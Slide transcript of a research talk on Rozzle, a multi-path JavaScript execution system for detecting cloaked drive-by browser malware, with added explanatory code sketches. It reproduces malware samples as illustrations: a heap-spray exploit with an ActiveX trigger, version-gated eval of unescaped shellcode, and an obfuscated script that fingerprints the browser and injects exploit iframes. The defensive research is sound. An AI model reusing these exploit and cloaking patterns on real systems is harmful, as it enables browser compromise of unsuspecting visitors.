Rozzle: De-Cloaking Internet Malware
Presenter: Yinzhi Cao
Slides by Ben Livshits, with Clemens Kolbitsch, Ben Zorn, Christian Seifert, Paul Rebriy
Microsoft Research

Static – Dynamic Analysis Spectrum
• Entirely static
  + High coverage
  + High scalability
  - Low precision
• Symbolic execution (DART, SAGE, KLEE)
  + High precision
  ? High coverage
  - May not scale
• Multi-execution
  + High precision
  + Scales reasonably well
  - Watch out for resource usage
• Entirely runtime
  + High precision
  - High overhead
  - Low coverage

Blacklisting Malware in Search Results

Motivation
Haha, I cannot belive this guy actually does this!! LOL

Drive-by Malware Detection Landscape
Axes: offline (honey-monkey) vs. online (browser-based); runtime vs. static
• Nozzle [Usenix Security ’09] (runtime)
  – Instrumented browser
  – Looks for heap sprays
  – Moderately high overhead
• Zozzle [Usenix Security ’11] (static)
  – Mostly static detection
  – Low overhead, high reach
  – Can be deployed in browser

Search Engine Crawling

Malware Cloaking
<script>
if (navigator.userAgent.indexOf('IE 6')>=0) {
  var x=unescape('%u4149%u1982%u90[…]');
  eval(x);
}
</script>
Server side: detect crawler
• Source IP
• Request (User Agent, Browser ID)
Client side: detect vulnerable target
• Fingerprint browser & plugin versions
• Do this using JavaScript

Client-side Cloaking Defense
Traditional vs. Rozzle
Rozzle:
• Single browser, one visit
• Appear as vulnerable as possible

Background and Related Work
• Drive-by download
  – Exploits a client-side browser vulnerability and thereby triggers the download of malware onto the client
  – Can be divided into six steps
• Description of the six steps
• Comparison with JShield

Step One: Visiting a malicious web site
• At this stage, a benign user visits a malicious web site.
• Defense mechanism: if the web site has been detected as malicious, a warning can be shown to keep the user from visiting it (as Google Safe Browsing does).

Step Two: Executing JavaScript
• After the content is downloaded to the client, its JavaScript gets executed.
• Related work: current approaches try to execute the JavaScript fully to get a better detection rate.
  – Zozzle ([Usenix, 2011]): executing JavaScript
  – Wepawet: executing JavaScript and extracting JavaScript from PDF
  – Rozzle ([Oakland, 2012]): symbolic execution + fingerprinting JavaScript

Step Three: Heap Spraying
• The JavaScript fills the heap with shellcode.
• Defense mechanism:
  – Zozzle ([Usenix, 2011]): machine learning
  – Nozzle ([Usenix, 2009]): detects whether heap objects contain executable code

Step Four: Exploiting a specific vulnerability
• The JavaScript code uses a specific pattern to trigger a native browser vulnerability.
• Defense mechanism:
  – BrowserShield: rewrites the JavaScript and checks whether an operation would trigger the vulnerability. For example, it can check the length of an operation.

Step Five: Downloading malware
• After the native browser vulnerability is exploited, malware is downloaded onto the client.
• Defense mechanism:
  – Blade ([CCS, 2010]): checks whether a download went through the normal download GUI. If it did not, the downloaded file is rejected.

Step Six: Executing malware
• After the malware is downloaded, it gets executed.
• Related work:
  – SpyProxy ([Usenix, 07])
  – WebShield ([NDSS, 11])
  – Provos et al. ([Usenix, 08])

Overview
• Background & Motivation: Cloaking
• Detecting Internet Malware
• Rozzle: Fighting Evasion
• Experiments

Detecting Internet Malware
• Nozzle: A Defense Against Heap-spraying Code Injection Attacks [Usenix Security 2009]
  – Scan heap allocated objects to identify valid x86 code sequences
  – Dynamic detection
• Zozzle: Low-overhead Mostly Static JavaScript Malware Detection [Usenix Security 2011]
  – Bayesian classification of hierarchical features of the JavaScript abstract syntax tree
  – In the browser (after unpacking)
  – Static detection
[Chart: Nozzle and Zozzle, x-axis dates from 6/1/2011 to 6/29/2011]
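The Bayesian classification idea can be illustrated with a toy example. The sketch below trains a simplified naive Bayes model over hand-written feature strings of the form "context:text" and only scores features that are present in a sample. The feature names, the training data, and the smoothing are assumptions made for illustration; they are not Zozzle's actual features or model.

```javascript
// Toy naive Bayes over string features such as "loop:unescape".
// Feature names and training samples are hypothetical, not Zozzle's real model.
function train(samples) {
  // samples: array of { features: string[], malicious: boolean }
  const counts = { true: new Map(), false: new Map() };
  const totals = { true: 0, false: 0 };
  for (const s of samples) {
    totals[s.malicious] += 1;
    for (const f of new Set(s.features)) {
      const perClass = counts[s.malicious];
      perClass.set(f, (perClass.get(f) || 0) + 1);
    }
  }
  return { counts, totals };
}

// Log-probability of a label given the features present in the sample.
function logScore(model, features, label) {
  const n = model.totals[label];
  const all = model.totals[true] + model.totals[false];
  let score = Math.log(n / all); // class prior
  for (const f of new Set(features)) {
    const c = model.counts[label].get(f) || 0;
    score += Math.log((c + 1) / (n + 2)); // Laplace smoothing
  }
  return score;
}

function classify(model, features) {
  return logScore(model, features, true) > logScore(model, features, false);
}

const model = train([
  { features: ["loop:unescape", "string:%u0D0D"], malicious: true },
  { features: ["loop:unescape", "call:eval"], malicious: true },
  { features: ["call:getElementById"], malicious: false },
  { features: ["call:addEventListener", "call:getElementById"], malicious: false },
]);

console.log(classify(model, ["loop:unescape"]));       // flagged as malicious
console.log(classify(model, ["call:getElementById"])); // treated as benign
```

A real classifier would extract the features from the parsed abstract syntax tree rather than take them as strings.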

Nozzle: Runtime Heap Spraying Detection
[Figure: normalized attack surface (NAS), good vs. bad]

Zozzle: Static/Statistical Detection
// Shellcode
var shellcode=unescape('%u9090%uceba%u11fa%u291f%ub1c9%udb33[…]');
bigblock=unescape("%u0D0D");
headersize=20;
shellcodesize=headersize+shellcode.length;
while(bigblock.length<shellcodesize){bigblock+=bigblock;}
heapshell=bigblock.substring(0,shellcodesize);
nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
while(nopsled.length+shellcodesize<0x25000){nopsled=nopsled+heapshell}
// Spray
var spray=new Array();
for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
// Trigger
function trigger(){
  varbdy = document.createElement('body');
  varbdy.addBehavior('#default#userData');
  document.appendChild(varbdy);
  try {
    for (iter=0;iter<10;iter++) {
      varbdy.setAttribute('s',window);
    }
  } catch(e){ }
  window.status+='';
}
document.getElementById('butid').onclick();

Overview
• Background & Motivation: Cloaking
• Detecting Internet Malware
• Rozzle: Fighting Evasion
• Experiments

Environment Fingerprinting Prevents Detection (Nozzle, Zozzle)
<script>
if (navigator.userAgent.indexOf('IE 6')>=0) {
  var x=unescape('%u4149%u1982%u90[…]');
  eval(x);
}
</script>
<script>
var adobe=new ActiveXObject('AcroPDF');
var adobeVersion=adobe.GetVariable('$version');
if (navigator.userAgent.indexOf('IE 6')>=0 && adobeVersion == '9.1.3') {
  var x=unescape('%u4149%u1982%u90[…]');
  eval(x);
}
</script>
Is this a practical problem for our malware detectors?
• In 7.7% of JS files, code gets a reference to environment
• In 1.2%, code branches on such sensitive values
• 89.5% of malicious JS branches on such values
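To make the distinction between "gets a reference to the environment" and "branches on such values" concrete, here is a deliberately crude, text-based sketch. The list of sensitive names and the regular expressions are assumptions for illustration, not the method used to obtain the figures on the slide. A purely textual check like this misses values that flow through variables first.

```javascript
// Hypothetical list of environment-sensitive names; not the list used in the study.
const SENSITIVE = [
  /navigator\.userAgent/,
  /navigator\.platform/,
  /ActiveXObject/,
  /ScriptEngine\s*\(/,
];

// True if the source text mentions any sensitive name at all.
function referencesEnvironment(source) {
  return SENSITIVE.some((re) => re.test(source));
}

// Crude check: does a sensitive name appear inside the parentheses of an `if (...)`?
function branchesOnEnvironment(source) {
  const ifConditions = source.match(/\bif\s*\(([^{}]*)\)/g) || [];
  return ifConditions.some((cond) => referencesEnvironment(cond));
}

const cloaked = "if (navigator.userAgent.indexOf('IE 6')>=0) { run(); }";
const readsOnly = "var ua = navigator.userAgent; log(ua);";
const plain = "var total = 1 + 2;";

console.log(referencesEnvironment(cloaked), branchesOnEnvironment(cloaked));
console.log(referencesEnvironment(readsOnly), branchesOnEnvironment(readsOnly));
console.log(referencesEnvironment(plain), branchesOnEnvironment(plain));
```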

Typical Malware Cloaking

More Complex Fingerprinting
Fingerprint: Q0193807F127J14

Avoiding Dynamic Crawlers

Avoiding Static Detection

How to Allocate Detection Resources?
[Figure: version numbers 1.4, 1.5, 2.0; 9.1, 10.0; 8, 9, 10; …, alongside Rozzle]
• Clearly does not scale
• How many resources should be allocated to simply filter malicious sites?
• What if the site is not malicious?

Rozzle: Multi-path execution framework for JavaScript
What it is/does
• Multiple browser profiles on a single machine
  – Similar to running multiple browsers in parallel
• Branch on environment-sensitive checks
• Execute individual branches sequentially to increase coverage
What it is not
• Cluster of machines: too resource-consuming
• Symbolic execution: no forking, no snapshotting, no reverting to a previous state
• Static analysis: Rozzle retains much of runtime precision

Multi-Execution in Rozzle
<script>
var adobe=new ActiveXObject('AcroPDF');
var adobeVersion=adobe.GetVariable('$version');
if (navigator.userAgent.indexOf('IE 7')>=0 && adobeVersion == '9.1.3') {
  var x=unescape('%u4149%u1982%u90[…]');
  eval(x);
} else if (adobeVersion == '8.0.1') {
  var x=unescape('%u4073%u8279%u77[…]');
  eval(x);
}
…
</script>
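The effect of multi-execution on a script shaped like the one above can be sketched with a tiny statement-tree interpreter. This is a hypothetical model for illustration only: the statement encoding, the `envSensitive` flag, and the payload labels are assumptions, and Rozzle itself works inside the JavaScript engine rather than on a hand-built tree.

```javascript
// Statements: { kind: "if", envSensitive, test, then, else } or { kind: "eval", payload }.
// Hypothetical mini-model; not Rozzle's engine-level implementation.
function explore(stmts, env, multiPath, seen = []) {
  for (const s of stmts) {
    if (s.kind === "eval") {
      seen.push(s.payload); // record what a detector would get to observe
    } else if (s.kind === "if") {
      if (multiPath && s.envSensitive) {
        // Environment-sensitive check: run both branches, one after the other.
        explore(s.then, env, multiPath, seen);
        explore(s.else || [], env, multiPath, seen);
      } else {
        explore(s.test(env) ? s.then : s.else || [], env, multiPath, seen);
      }
    }
  }
  return seen;
}

// Mirrors the structure of the slide's script with placeholder payload labels.
const program = [
  {
    kind: "if",
    envSensitive: true,
    test: (e) => e.userAgent.includes("IE 7") && e.adobeVersion === "9.1.3",
    then: [{ kind: "eval", payload: "payload-A" }],
    else: [
      {
        kind: "if",
        envSensitive: true,
        test: (e) => e.adobeVersion === "8.0.1",
        then: [{ kind: "eval", payload: "payload-B" }],
      },
    ],
  },
];

const crawlerEnv = { userAgent: "Firefox", adobeVersion: "none" };
console.log(explore(program, crawlerEnv, false)); // single path: nothing is revealed
console.log(explore(program, crawlerEnv, true));  // multi-path: both payloads are revealed
```

In a single visit with one profile, the multi-path run exposes both payloads that a single concrete run would never reach.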

Challenges: Consistent updates of variables
Introduce concept of Symbolic Memory:
• Multiple concrete values associated with one variable
• New JavaScript data type: Symbolic
  – 3 subtypes: symbolic value / formula / conditional
• Weak updates for conditional assignments
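One way to picture the three subtypes and a weak update is the sketch below. The object shapes and the `assign` helper are hypothetical and chosen only for illustration; the slides do not show how the engine actually represents symbolic values.

```javascript
// Hypothetical encodings of the three symbolic subtypes named on the slide.
const symValue = (name) => ({ type: "value", name }); // e.g. navigator.userAgent
const symFormula = (op, ...args) => ({ type: "formula", op, args });
const symCond = (test, ifTrue, ifFalse) => ({ type: "conditional", test, ifTrue, ifFalse });

// Weak update: an assignment made under a symbolic path predicate keeps the old
// value for the paths on which the predicate does not hold.
function assign(memory, variable, newValue, pathPredicate) {
  const old = memory.get(variable);
  memory.set(
    variable,
    pathPredicate ? symCond(pathPredicate, newValue, old) : newValue
  );
}

const memory = new Map();
assign(memory, "isIE", false, null); // var isIE = false; (no symbolic predicate)

// Inside `if (navigator.userAgent.indexOf('IE') >= 0) { isIE = true; }`
const predicate = symFormula(
  ">=",
  symFormula("indexOf", symValue("navigator.userAgent"), "IE"),
  0
);
assign(memory, "isIE", true, predicate);

console.log(JSON.stringify(memory.get("isIE"), null, 2));
```

After the second assignment, `isIE` holds a conditional that is `true` where the predicate holds and `false` elsewhere, so neither concrete value is lost.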

Symbolic Memory
<script>
var userAgentString=0;
userAgentString = navigator.userAgent;
var isIE;
isIE = (userAgentString.indexOf('IE')>=0);
…
Hooks into engine, return symbolic values for
• Sensitive global objects: navigator.userAgent, navigator.platform, …
• Sensitive functions: ScriptEngine(), allocation of ActiveXObject, …
Symbolic memory state:
• Variable: userAgentString; Value: 0, then <navigator.userAgent>; Symbolic: no, then yes
• Variable: isIE; Value: <navigator.userAgent.indexOf('IE') >= 0>; Symbolic: yes

Symbolic Memory
<script>
var isIE=false;
var isIE7=false;
if (navigator.userAgent.indexOf('IE')>=0) {
  isIE=true;
  if (navigator.userAgent.indexOf('IE 7')>=0) {
    isIE7=true;
  }
}
if (isIE7) { …
Symbolic memory state:
• Variable: isIE; Value: false, then <nav.userAgent.indexOf(…)>=0> ? true : false; Symbolic: no, then yes
• Variable: isIE7; Value: false, then <…>; Symbolic: no, then yes
• Current path predicate: <nav.userAgent.indexOf(..)>=0>, then <nav.userAgent.indexOf(..)>=0> && <nav.userAgent.indexOf(..)>=0>; Symbolic: yes

Symbolic Memory
Variable: isIE
Value: <nav.userAgent.indexOf(…)>=0> ? true : false
Symbolic: yes
Expression tree:
?
├─ >=
│  ├─ indexOf
│  │  ├─ navigator.userAgent
│  │  └─ 'IE'
│  └─ 0
├─ true
└─ false
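The expression tree for `isIE` can be written down and concretized for different browser profiles, as in the sketch below. The nested-object encoding, the `evaluate` helper, and the sample user-agent strings are assumptions for illustration, not the representation used by Rozzle.

```javascript
// The tree from the slide as nested objects (a hypothetical encoding).
const isIE = {
  op: "?:",
  args: [
    {
      op: ">=",
      args: [
        { op: "indexOf", args: [{ sym: "navigator.userAgent" }, "IE"] },
        0,
      ],
    },
    true,
    false,
  ],
};

// Concretize a tree for one browser profile (a map from symbolic names to values).
function evaluate(node, profile) {
  if (node === null || typeof node !== "object") return node; // literal
  if ("sym" in node) return profile[node.sym]; // symbolic leaf
  const a = node.args.map((x) => evaluate(x, profile));
  switch (node.op) {
    case "indexOf":
      return a[0].indexOf(a[1]);
    case ">=":
      return a[0] >= a[1];
    case "?:":
      return a[0] ? a[1] : a[2];
    default:
      throw new Error("unknown operator: " + node.op);
  }
}

const ieProfile = { "navigator.userAgent": "Mozilla/4.0 (compatible; MSIE 7.0)" };
const otherProfile = { "navigator.userAgent": "Mozilla/5.0 Firefox/3.6" };

console.log(evaluate(isIE, ieProfile));
console.log(evaluate(isIE, otherProfile));
```

Keeping the tree around means the concrete value only has to be computed when something actually needs it.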

Challenges
• Consistent updates of variables
• Handling loops
  – Loop condition might be symbolic, number of iterations unknown!
  – Unroll k iterations (currently k=1)
  – Instruction pointer checks (endless loops/recursion)
• Indirect control flow: exception handling
  – try-blocks regularly used to test availability of plugins (ActiveXObjects)
  – catch-blocks set default values, cannot be ignored
  – Execute catch-statement similar to else branch, add virtual if-condition: "ActiveX supported"
• I/O
  – Handling symbolic values when they are…
    … written to the DOM
    … sent to a remote server
    … executed (as part of eval)
  – Lazy evaluation to concrete values (only when needed)
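The loop-handling rule (unroll k iterations when the condition is symbolic, currently k=1) can be sketched as follows. The `SYMBOLIC` marker, the `runLoop` helper, and the `maxSteps` guard are hypothetical; the guard is only a stand-in for the instruction pointer checks mentioned on the slide.

```javascript
// Stand-in for "this condition depends on the environment and has no concrete value".
const SYMBOLIC = Symbol("symbolic");

// Run a loop whose condition may be symbolic. Concrete conditions behave normally;
// symbolic ones are unrolled at most k times, since the iteration count is unknown.
function runLoop(condition, body, state, k = 1, maxSteps = 1000) {
  let unrolled = 0;
  for (let steps = 0; steps < maxSteps; steps++) { // guard against endless loops
    const c = condition(state);
    if (c === SYMBOLIC) {
      if (unrolled >= k) break; // already unrolled k iterations
      unrolled += 1;
    } else if (!c) {
      break; // concrete condition turned false
    }
    body(state);
  }
  return state;
}

// Concrete condition: runs exactly three times.
const concrete = runLoop((s) => s.i < 3, (s) => { s.i += 1; }, { i: 0 });

// Symbolic condition: the body runs once with the default k = 1.
const symbolic = runLoop(() => SYMBOLIC, (s) => { s.n += 1; }, { n: 0 });

console.log(concrete.i, symbolic.n);
```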

Experiments
Offline
• Controlled experiment
• 7x more Nozzle detections
Online
• Similar to Bing crawling
• Almost 4x more Nozzle detections
• 10.1% more Zozzle detections
Overhead
• 1.1% runtime overhead
• 1.4% memory overhead

Offline
• Exploits hosted on our server
• Minimize external influences
• 70,000 known malicious scripts (flagged by Zozzle)
• Fully unrolled/de-obfuscated exploits, wrapped in HTML
[Chart: Shared, New Detections, Errors; Zozzle: 70k; labeled value: 10,381; x-axis from -2,000 to 12,000]
+595% runtime detections

Online
• Dedicated machine for crawling the web
• Clone of the Bing malware crawler
• List of URLs recently crawled by Bing
• Pre-filtering: increase likelihood of finding malicious sites
• 57,000 URLs over the last week
[Charts: Nozzle Detections and Zozzle Detections; values shown: 225, 24, 156, 50, 174, 2,510]
+203% runtime detections

Overhead
• Average numbers of 3 repeated runs per configuration
• Base runs (cookie setup)
• 500 randomly selected URLs crawled by Bing
• Slightly biased towards malicious sites (pre-filtering)
Runtime overhead
• Median: 0.0%
• 80th percentile: 1.1%
Memory overhead
• Median: 0.6%
• 80th percentile: 1.4%
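For readers who want to reproduce summary statistics of this kind from their own measurements, here is a minimal sketch of a nearest-rank percentile over per-URL overhead ratios. The sample ratios are made up for illustration and are not the measurements from the talk; the choice of the nearest-rank method is also an assumption, since the slides do not say how the percentiles were computed.

```javascript
// Nearest-rank percentile: the smallest value with at least p% of the data at or below it.
function percentile(values, p) {
  const sorted = [...values].sort((a, b) => a - b);
  const rank = Math.max(1, Math.ceil((p * sorted.length) / 100));
  return sorted[rank - 1];
}

// Convert a ratio such as 1.01 (instrumented time / base time) to a percentage overhead.
const overheadPercent = (ratio) => (ratio - 1) * 100;

// Made-up sample ratios, not the measurements from the talk.
const ratios = [1.0, 1.0, 1.0, 1.01, 1.5];

console.log("median ratio:", percentile(ratios, 50));
console.log("80th percentile ratio:", percentile(ratios, 80));
console.log("80th percentile overhead (%):", overheadPercent(percentile(ratios, 80)).toFixed(1));
```

A single slow outlier (1.5 in the sample) does not move the median or the 80th percentile, which is why these statistics suit skewed overhead data.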

Overhead Numbers
[Histogram of overhead ratios; x-axis buckets from 0.700 to 2.140]

Take Away
• For most sites, virtually no overhead
• Tremendous impact on runtime detector due to increased path coverage
• Visible impact on static detector
• More important with growing trend to obfuscation
• Also improves other existing tools: exposes detectors to additional site content

Online: … an example pulled from our DB…
if (navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73\x69\x65"+"\x20\x36")>0)
  document.write("<iframe src=x6.htm></iframe>");
if (navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37")>0)
  document.write("<iframe src=x7.htm></iframe>");
try {
  var a;
  var aa=new ActiveXObject("Sh"+"ockw"+"av"+"e"+"Fl"+[…]);
} catch(a) { }
finally {
  if (a!="[object Error]")
    document.write("<iframe src=svfl9.htm></iframe>");
}
try {
  var c;
  var f=new ActiveXObject("O"+"\x57\x43"+"\x31\x30\x2E\x53"+[…]);
} catch(c) { }
finally {
  if (c!="[object Error]") {
    aacc = "<iframe src=of.htm></iframe>";
    setTimeout("document.write(aacc)", 3500);
  }
}
Decoded strings:
• "\x6D"+"\x73\x69\x65"+"\x20\x36" = "msie 6"
• "\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37" = "msie 7"
• "O"+"\x57\x43"+"\x31\x30\x2E\x53"+"pr"+"ea"+"ds"+"he"+"et" = "OWC10.Spreadsheet"
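The string obfuscation in this example is easy to check by hand. The sketch below assumes the fragments are JavaScript hex escapes whose backslashes were lost in the slide text (for instance "x 6 D" standing for "\x6D"); the variable names and the sample user-agent string are made up for illustration.

```javascript
// Hex escapes inside string literals are resolved by the JavaScript parser,
// so the concatenations collapse to plain fingerprinting strings at runtime.
const msie6 = "\x6D" + "\x73\x69\x65" + "\x20\x36";
const msie7 = "\x6D" + "\x73" + "\x69" + "\x65" + "\x20" + "\x37";
const owcPrefix = "O" + "\x57\x43" + "\x31\x30\x2E\x53"; // the slide elides the rest with […]

console.log(msie6);     // msie 6
console.log(msie7);     // msie 7
console.log(owcPrefix); // OWC10.S

// The same check the sample performs, against a made-up lowercase user-agent string.
const sampleUserAgent = "mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)";
console.log(sampleUserAgent.indexOf(msie6) > 0);
```

Because the strings only exist after evaluation, a purely textual scan for "msie" would not find them.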

Summary
• Rozzle: Multi-profile execution
  – Look as vulnerable as possible
  – Improve existing malware detectors
• Implementation:
  – Implemented on top of IE 9’s JavaScript engine
  – Still some flaws, promising results
• Idea of multi-execution is promising in other contexts

Static – Dynamic Analysis Spectrum
• Entirely static
  + High coverage
  + High scalability
  - Low precision
• Symbolic execution (DART, SAGE)
  + High precision
  ? High coverage
  - May not scale
• Multi-execution
  + Scales reasonably well
  - Watch out for resource usage
• Entirely runtime
  + High precision
  - High overhead
  - Low coverage